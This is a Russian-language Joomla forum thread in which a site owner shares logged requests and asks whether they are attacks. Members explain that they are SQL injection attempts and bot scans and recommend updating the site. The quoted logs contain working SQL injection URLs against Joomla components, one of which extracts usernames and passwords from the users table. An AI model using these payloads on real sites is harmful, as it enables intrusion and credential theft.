Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2080 Просмотров
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Безопасность сайта
« : 11.07.2014, 14:52:59 »
Добрый день!
У меня сайт на Joomla! 2.5.
Обнаружил в компоненте перепаправление, такие запросы:
http://мой сайт/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat_ws(0x3B,123,321),4,5,6,7,8,9,10--

http://мой сайт/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,234567--

http://мой сайт/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat_ws(0x3B,123,321)--

http://мой сайт/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component

Это, что попытка взломать сайт?Или какой то робот ходит?
Интересно стало.
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Безопасность сайта
« Ответ #1 : 11.07.2014, 15:13:30 »
Попытка взлома, так называемый SQL Injection.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Безопасность сайта
« Ответ #2 : 11.07.2014, 15:20:54 »
Цитировать
Или какой то робот ходит?
Угу, из Нидерландов. Бань по IP
109.201.152.246
109.201.152.225
109.201.152.25
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #3 : 11.07.2014, 20:46:20 »
Спасибо, за ответ.
Прочитал про SQL Injection в Википедии, для меня темный лес.
Но сайт работает, значит попытка не удалась?
Не понимаю, надо что-то делать?
А в Метрике посмотрел, у меня визиты из США, Германии, Ирландии, Праги, Нидерландов. Продолжительность посещения 00:00.
Сайт на россиян расcчитан.
Еще раз Спасибо Всем. ^-^
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Безопасность сайта
« Ответ #4 : 13.07.2014, 11:42:38 »
Цитировать
Не понимаю, надо что-то делать?
Это боты ходят они по всем сайтам в сети лазят, не берите в голову, главное вовремя обновляйте все на сайте и минимальные требования по защите выполните.
Цитировать
Но сайт работает, значит попытка не удалась?
Сайт будет после взлома продолжать работать как и работал и вы не заметите что сайт был взломан.
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #5 : 13.07.2014, 12:25:50 »
Да. Дефейсят в последнее время редко.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #6 : 13.07.2014, 13:20:16 »
Спасибо всем за ответы!
Поставил защиту.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #7 : 15.07.2014, 14:18:33 »
Только ЗА 14 ИЮЛЯ ЗАПРОСЫ.
У меня на двух сайтах.
Начинает настораживать!
Или у всех так? ^-^

http://мой сайт/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140714-235809
http://мой сайт/index.php?option=com_community&view=frontpage&140714-235809
http://мой сайт/index.php?140714-235809
http://мой сайт/wp-content/
http://мой сайт/admin/content/sitetree/
http://мой сайт/users/registrate/
http://мой сайт/installed
http://мой сайт/users/forget/
http://мой сайт/netcat/admin/
http://мой сайт/plugins/search/index.php
http://мой сайт/database/
http://мой сайт/bkp/
http://мой сайт/administrator/components/com_admin/index.php
http://мой сайт/_backups/
http://мой сайт/bitrix/admin/
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #8 : 15.07.2014, 14:44:20 »
У всех.
*

Valery007

  • Новичок
  • 5
  • 0 / 0
Re: Безопасность сайта
« Ответ #9 : 15.07.2014, 14:50:05 »
Спасибо, успокоили!
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Безопасность сайта
« Ответ #10 : 15.07.2014, 22:28:30 »
Это кстати повод напрягаться и следить за актуальностью сайта. Как правило бот лезут с не сильно свежими уязвимостями и сканят по шаблону.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3146
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 268125
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2749
Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2409
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 5043
Последний ответ 28.08.2020, 22:00:30
от cntrl